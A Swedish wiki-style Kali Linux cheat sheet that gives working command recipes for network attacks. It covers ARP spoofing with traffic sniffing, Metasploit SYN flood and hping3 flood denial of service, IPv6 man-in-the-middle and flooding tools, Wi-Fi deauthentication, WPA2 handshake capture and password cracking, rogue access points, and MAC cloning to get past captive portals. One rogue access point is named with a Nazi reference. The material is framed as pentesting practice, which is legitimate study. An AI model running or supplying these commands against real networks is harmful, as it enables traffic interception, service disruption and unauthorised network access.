Kali Linux
Kali Linux är en Debian-baserad Linuxdistribution avsedd för digitala penetrationstester och etisk hacking. Kali är uppföljaren till BackTrack.
Grundsetup
IP
ifconfig eth0 10.0.0.5/24 up route add default gw 10.0.0.1 echo nameserver 8.8.8.8 > /etc/resolv.conf
SSH-server
start networking sshd-generate start ssh update-rc.d -f ssh defaults
Docker
Et snabbt sätt att komma igång med Kali är med docker.
docker pull kalilinux/kali-linux-docker docker run -t -i kalilinux/kali-linux-docker /bin/bash root@aaca1ac4f5b5:/# ping 8.8.8.8
Verktyg
Kali är utrustat med väldigt många verktyg. Här listas några och vad de används till.
Nmap
Security Scanner
Yersinia
Attacker mot det mesta som har med nätverk att göra, inkl DHCP, STP, CDP, DTP, HSRP, VTP, 802.1q, 802.1x. Startas med:
yersinia -G
ARPSpoof
echo 1 > /proc/sys/net/ipv4/ip_forward arpsoof -i eth0 -t 10.0.0.15 10.0.0.1 arpsoof -i eth0 -t 10.0.0.1 10.0.0.15
Samla sedan data
driftnet -i eth0 urlsnarf -i eth0
TCP Synflood
use auxiliary/dos/tcp/synflood set RHOST 192.168.1.1 set SHOST 10.0.0.50 run
Hydra
Password cracker
Maltego
Gather information about ip addresses and domains
Metasploit
Vulnerability testing
Burp Suite
Proxy/Spider
Scapy
Packet Manipulation Tool
Hping3 - TCP Ping
hping3 -S 10.10.10.10 -a 10.10.10.12 -p 22 --flood
Parasite6 - IPv6 MITM
echo 1 > /proc/sys/net/ipv6/conf/all/forwarding parasite6 -lR eth0
Wireless
Börja med att konfa svenska inställningar
iw reg set SE iwconfig wlan0 txpower 27
Uncovering Hidden SSID
airmon-ng start wlan0 airodump-ng mon0 airodump-ng -c 11 mon0 aireplay-ng -0 2 -a [BSSID] mon0
iwconfig wlan0 essid [ESSID] channel 11 macchanger -m [MAC address] wlan0
WPA2
airmon-ng start wlan0 airodump-ng -w OURFILE -c 11 --bssid [BSSID] mon0 aireplay-ng -0 2 -a [BSSID] mon0 aircrack-ng OURFILE-01.cap -w /pentest/passwords/wordlists/darkc0de.lst wpaclean <out.cap> <in.cap>
with crunch:
crunch x X "characters" | aircrack-ng ".cap file" -w - -e "essid"
with john the ripper:
john -stdout -incremental:all | aircrack-ng ".cap file" -w - -e "essid"
Rogue AP
apt-get install dhcp3-server -y mv /etc/dhcp3/dhcpd.conf /etc/dhcp3/dhcpd.conf.bak nano /etc/dhcp3/dhcpd.conf ddns-update-style ad-hoc; default-lease-time 600; max-lease-time 7200; subnet 192.168.1.0 netmask 255.255.255.0 { option subnet-mask 255.255.255.0; option broadcast-address 192.168.1.255; option routers 192.168.1.1; option domain-name-servers 192.168.1.1; range 192.168.1.10 192.168.1.100; }
airmon-ng start wlan0 airodump-ng mon0 airbase-ng --essid "Hitlerklubben" -c 11 mon0 ifconfig at0 192.168.1.1/24 up route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1 dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0 /etc/init.d/dhcp3-server start iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT echo 1 > /proc/sys/net/ipv4/ip_forward
Bridging
airmon-ng start wlan0 airodump-ng mon0 airbase-ng --essid "Hitlerklubben" -c 11 mon0 ifconfig at0 brctl addbr BR1 brctl addif BR1 eth0 brctl addif BR1 at0 brctl show ifconfig eth0 0.0.0.0 up ifconfig at0 0.0.0.0 up ifconfig BR1 192.168.1.50/24 up echo 1 > /proc/sys/net/ipv4/ip_forward
IPv6
Med IPv6 finns det mycket att tänka på och testa.
fake_router6 eth0 2001::/64 detect-new-ip6 eth0 dos-new-ip6 eth0 flood_router6 eth0 flood_advertise6 eth0 implementation6 eth0 2001::1 smurf6 eth0 2001::1
Captive portal
Många företag tex hotel använder en captive portal för att kontrollera vilka som använder deras trådlösa nätverk.
Många portaler filtrerar på MAC så om man hittar en som fungerar via en ipscan så räcker det för att komma åt internet.